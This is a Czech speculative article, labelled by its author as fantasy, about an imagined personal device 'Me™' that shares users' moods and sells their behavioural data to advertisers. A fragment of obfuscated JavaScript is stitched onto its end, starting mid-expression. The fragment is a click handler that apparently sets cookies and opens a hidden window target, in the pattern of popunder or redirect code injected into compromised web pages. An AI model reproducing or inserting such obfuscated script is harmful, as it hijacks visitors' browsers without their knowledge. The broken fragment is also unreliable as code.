Řeknu Vám naprosto přesně, jak k tomu dojde. Každý z nás bude mít u sebe malý přístroj, velikosti PDA. Tento přístroj bude registrován v celosvětové síti pomocí svého unikátního ID, které bude představovat telefonní číslo, nebo IP adresa.
Me™ bude zvládat standardní funkce, které má dnes běžný mobilní přístroj. Tedy telefonování, fotografování, bude umět přehrávat hudbu jako Mp3 player. To ale rozhodně není všechno. Pomocí toho přístroje, bude uživatel moci přijímat rozhlasové stanice, díky 3″ displeji bude sledovat televizní kanály, případně surfovat po internetu.
Me™ bude ještě více než komunikátor. Předností totiž bude připojení všech uživatelů ke globální síti a jejich unikátní personifikace v této síti. Každé Me™ se totiž bude tvářit jako jeho majitel. Bude tak zcela automaticky přenášet jeho pocity, stejně jako je tomu dnes v oblasti sociálních sítí Facebook.com atp. Jednotliví občané spolu budou v reálném čase komunikovat, sdružovat se ve skupinách.
Me™ bude využíváno institucemi, jako elektronický, pohodlný a online kontakt s občanem. A pochopitelně také obráceně. Přijde vám něco do schránky? Me™ vám to řekne. Případně za Vás daný problém rovnou vyřeší na základě zadaných predikcí. Chcete zaparkovat v zóně? Me™ vás tam legálně pustí a ještě nahlásí polohu vašeho vozu na policii.
Me™ tu bude především pro usnadnění života. Bude to komunikátor pro komunikaci s ostatními občany. Bude to osobní kancelář a osobní asistentka. Me™ nás ale bude také bavit. Ukáže nám nové fotografie a videa našich přátel, sdělí nám jejich aktuální pocity. Ovšem ne tak, že si přečteme: „Kateřina říká: Dneska bych něco podnikla!“ Me™, nám tyto pocity přehraje v krátkém videu, ve kterém nám to Kateřina ze záznamu řekne osobně!
Ten, kdo jako první začne realizovat myšlenku skutečně unikátního osobního multifunkčního přístroje, bude muset počítat s nemalými náklady. Ty se však velmi rychle vrátí a nebude to z prodeje přístroje. Ten bude za velmi symbolickou cenu. Náklady vrátí zpět marketing. Me™ totiž bude velmi dobrým zdrojem demografických dat o svém majiteli, jeho pohybu a momentálních pocitech, potřebách a touhách.
Reklamní společnosti tak budou moci cílit své reklamní kampaně naprosto přesně a konkrétně. Už nyní se hovoří o behaviorálním cílení reklamy. Pokud můj Me™ ukazuje, že mám hlad, a jsem v místě XY, zcela logicky dostanu unikátní pozvánku z restaurace za rohem. Pokud se pohybuji v bazaru, osloví mne finanční instituce s nabídkou leasingu či jiných služeb. Toto je cílem všech reklamních společností. Objevit v uživateli touhu, kterou mohou naplnit.
Chcete Me™ ?
(tento článek je pouhou fantazií autora)
0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());